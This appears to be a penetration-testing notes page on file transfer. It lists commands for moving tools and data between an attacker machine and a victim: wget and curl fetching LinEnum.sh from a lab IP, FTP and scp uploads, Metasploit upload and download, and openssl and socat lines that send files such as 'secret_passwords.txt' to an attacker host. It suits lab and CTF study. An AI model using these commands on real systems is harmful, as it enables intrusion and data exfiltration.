File Transfer

certutil -encode infile.exe outfile.txt

#Text splitter
https://textfilesplitter.com/

nc

-n option to skip DNS name resolution

On Kali : /usr/share/windows-resources/binaries/nc.exe
Get the 32bit version here:

nc.exe/nc.exe at master · int0x33/nc.exeGitHub

Get the 64bit version here:

https://github.com/int0x33/nc.exe/blob/master/nc64.exe

Hosting a server

python -m SimpleHTTPServer
python3 -m http.server

HTTP

wget 10.10.14.23:8000/LinEnum.sh 

axel -a -n 20 -o report_axel.pdf https://file-to-download.txt

curl 10.10.14.23:8000/LinEnum.sh -o /tmp/Enum.sh

FTP

#Attacker's System
pip3 install pyftpdlib
python -m pyftpdlib 21 --write

#Victim's System
ftp 10.10.10.13

scp

#Local > Target
scp -i privkey /local/file user@10.10.10.119:/tmp/

Convert to Base64

echo file | base64 
base64 -d foo.zip > foo2.zip

Tip: The base64 encoded string does contain a bunch of new lines, you can remove them in vi using the command: “:%s/\n/g”

Metasploit

Upload

upload /root/Desktop/Destination_Directory

Download

download filename /Destination/Directory

openssl

https://gtfobins.github.io/gtfobins/openssl/

openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE"

socat

#Attacker host- Send file via 443
sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt

#Victim's host- Downlaod file from Remote IP on port 443
TCP4:<Attacker IP>:443 file:received_secret_passwords.txt,create

PreviousPassword Cracking NextExploitation Techniques

Last updated 2 years ago